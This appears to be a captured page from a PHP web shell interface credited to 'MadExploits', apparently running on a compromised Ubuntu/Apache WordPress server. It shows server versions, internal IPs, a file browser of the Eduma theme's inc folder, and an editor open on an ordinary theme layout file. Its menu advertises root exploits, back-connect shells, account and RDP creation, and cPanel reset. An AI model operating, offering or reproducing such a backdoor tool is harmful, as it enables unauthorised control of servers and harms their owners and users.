Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
owc /
wp-content /
themes /
eduma-old /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-x--x
data
[ DIR ]
drwxr-x--x
header
[ DIR ]
drwxr-x--x
libs
[ DIR ]
drwxr-x--x
templates
[ DIR ]
drwxr-x--x
widgets
[ DIR ]
drwxr-x--x
custom-functions.php
76.83
KB
-rwxr-x--x
learnpress-functions.php
50.23
KB
-rwxr-x--x
learnpress-v3-functions.php
33.8
KB
-rwxr-x--x
learnpress-v4-functions.php
27.59
KB
-rwxr-x--x
lp-course_offline.php
20.35
KB
-rwxr-x--x
register-functions.php
18.83
KB
-rwxr-x--x
related.php
1.61
KB
-rwxr-x--x
tax-meta.php
3.41
KB
-rwxr-x--x
template-tags.php
13.76
KB
-rwxr-x--x
thim-core-function.php
10.39
KB
-rwxr-x--x
upgrade.php
17.23
KB
-rwxr-x--x
wrapper-before-after.php
6.99
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wrapper-before-after.php
<?php if ( ! function_exists( 'thim_wrapper_layout' ) ) : function thim_wrapper_layout() { $theme_options_data = get_theme_mods(); $get_post_type = get_post_type(); global $wp_query; $using_custom_layout = $wrapper_layout = $cat_ID = ''; $class_col = 'col-sm-9 alignleft'; $prefix = thim_get_prefix_page_title(); if ( is_front_page() || is_home() ) { $prefix = 'thim_front_page'; } elseif ( is_page() ) { $prefix = 'thim_page'; } // get id category $cat_obj = $wp_query->get_queried_object(); if ( isset( $cat_obj->term_id ) ) { $cat_ID = $cat_obj->term_id; } // get layout if ( is_page() || is_single() ) { $postid = get_the_ID(); if ( $get_post_type == "forum" || $get_post_type == "topic" ) { $wrapper_layout = isset( $theme_options_data[$prefix . '_cate_layout'] ) ? $theme_options_data[$prefix . '_cate_layout'] : ''; } if ( isset( $theme_options_data[$prefix . '_single_layout'] ) ) { $wrapper_layout = $theme_options_data[$prefix . '_single_layout']; } if ( is_page() ) { if ( ! empty( $theme_options_data[$prefix . '_layout'] ) ) { $wrapper_layout = $theme_options_data[$prefix . '_layout']; } else { $wrapper_layout = 'full-content'; } } /***********custom layout*************/ $using_custom_layout = get_post_meta( $postid, 'thim_mtb_custom_layout', true ); if ( $using_custom_layout ) { $wrapper_layout = get_post_meta( $postid, 'thim_mtb_layout', true ); } // no sidebar single course in style 1 & 3 if ( ( thim_lp_style_single_course() == 'new-1' || thim_lp_style_single_course() == 'layout_style_3' ) && $prefix == 'thim_learnpress' ) { $wrapper_layout = 'full-content'; } } else { if ( isset( $theme_options_data[$prefix . '_cate_layout'] ) ) { $wrapper_layout = $theme_options_data[$prefix . '_cate_layout']; } if ( $get_post_type == "lp_collection" ) { $wrapper_layout = $theme_options_data[$prefix . '_single_layout']; } /***********custom layout*************/ $using_custom_layout = get_term_meta( $cat_ID, 'thim_layout', true ); if ( $using_custom_layout <> '' ) { $wrapper_layout = get_term_meta( $cat_ID, 'thim_layout', true ); } } if ( $wrapper_layout == 'full-content' ) { $class_col = "col-sm-12 full-width"; } if ( $wrapper_layout == 'sidebar-right' ) { $class_col = "col-sm-9 alignleft"; } if ( $wrapper_layout == 'sidebar-left' ) { $class_col = 'col-sm-9 alignright'; } if ( $wrapper_layout == 'full-width' ) { $class_col = 'content-wide'; } return $class_col; } endif; // add_action( 'thim_wrapper_loop_start', 'thim_wrapper_loop_start', 10 ); if ( ! function_exists( 'thim_wrapper_loop_start' ) ) : function thim_wrapper_loop_start() { $theme_options_data = get_theme_mods(); $class_no_padding = ''; if ( is_page() || is_single() ) { $mtb_no_padding = get_post_meta( get_the_ID(), 'thim_mtb_no_padding', true ); if ( $mtb_no_padding ) { $class_no_padding = ' no-padding-top'; } } //thim_no_padding_content $class_col = thim_wrapper_layout(); $sidebar_class = ''; if ( is_404() ) { $class_col = 'col-sm-12 full-width'; } if ( $class_col == "col-sm-9 alignleft" ) { $sidebar_class = ' sidebar-right'; } if ( $class_col == "col-sm-9 alignright" ) { $sidebar_class = ' sidebar-left'; } if ( $class_col == "content-wide" ) { $sidebar_class = '-fluid'; } do_action( 'thim_before_site_content' ); echo '<div class="container' . $sidebar_class . $class_no_padding . ' site-content">'; echo '<div class="row"><main id="main" class="site-main ' . $class_col . '">'; } endif; add_action( 'thim_wrapper_loop_end', 'thim_wrapper_loop_end', 10 ); if ( ! function_exists( 'thim_wrapper_loop_end' ) ) : function thim_wrapper_loop_end() { $class_col = thim_wrapper_layout(); $get_post_type = get_post_type(); if ( is_404() ) { $class_col = 'col-sm-12 full-width'; } echo '</main>'; if ( $class_col == 'col-sm-9 alignleft' || $class_col == 'col-sm-9 alignright' ) { if ( is_search() ) { get_sidebar(); } else if ( $get_post_type == "lp_course" || $get_post_type == "lp_quiz" || thim_check_is_course() || thim_check_is_course_taxonomy() ) { get_sidebar( 'courses' ); } else if ( $get_post_type == "tp_event" ) { get_sidebar( 'events' ); } else if ( $get_post_type == "product" ) { get_sidebar( 'shop' ); } else { get_sidebar(); } } echo '</div>'; do_action( 'thim_after_site_content' ); echo '</div>'; } endif; add_action( 'thim_wrapper_loop_start', 'thim_wrapper_div_open', 1 ); if ( ! function_exists( 'thim_wrapper_div_open' ) ) { function thim_wrapper_div_open() { echo '<section class="content-area">'; } } add_action( 'thim_wrapper_loop_end', 'thim_wrapper_div_close', 30 ); if ( ! function_exists( 'thim_wrapper_div_close' ) ) { function thim_wrapper_div_close() { echo '</section>'; } } // show switch layout for blog if ( ! function_exists( 'thim_blog_switch_layout' ) ) { function thim_blog_switch_layout() { if ( is_front_page() || is_home() ) { $prefix = 'thim_front_page'; } else { $prefix = 'thim_archive'; } if ( get_theme_mod( $prefix . '_cate_display_layout' ) != 'grid' ) { return; } global $wp_query; if ( is_category() ) { $total = get_queried_object(); $total = $total->count; } elseif ( ! empty( $_REQUEST['s'] ) ) { $total = $wp_query->found_posts; } else { $total = wp_count_posts( 'post' ); $total = $total->publish; } if ( $total == 0 ) { echo '<p class="message message-error">' . esc_html__( 'There are no available posts!', 'eduma' ) . '</p>'; return; } elseif ( $total == 1 ) { $index = esc_html__( 'Showing only one result', 'eduma' ); } else { $courses_per_page = absint( get_option( 'posts_per_page' ) ); $paged = get_query_var( 'paged' ) ? intval( get_query_var( 'paged' ) ) : 1; $from = 1 + ( $paged - 1 ) * $courses_per_page; $to = ( $paged * $courses_per_page > $total ) ? $total : $paged * $courses_per_page; if ( $from == $to ) { $index = sprintf( esc_html__( 'Showing last post of %s results', 'eduma' ), $total ); } else { $index = sprintf( esc_html__( 'Showing %s-%s of %s results', 'eduma' ), $from, $to, $total ); } } ?> <div class="thim-blog-top switch-layout-container"> <div class="switch-layout"> <a href="#" class="list switchToGrid switch-active"><i class="fa fa-th-large"></i></a> <a href="#" class="grid switchToList"><i class="fa fa-list-ul"></i></a> </div> <div class="post-index"><?php echo esc_html( $index ); ?></div> </div> <?php } } if ( ! function_exists( 'thim_blog_show_decription' ) ) { function thim_blog_show_decription() { if ( get_theme_mod( 'thim_archive_cate_show_description', false ) && category_description() ) { echo '<div class="desc_cat">' . category_description() . '</div>'; } } } add_action( 'thim_blog_before_main_content', 'thim_blog_switch_layout', 10 ); add_action( 'thim_blog_before_main_content', 'thim_blog_show_decription', 20 );
Close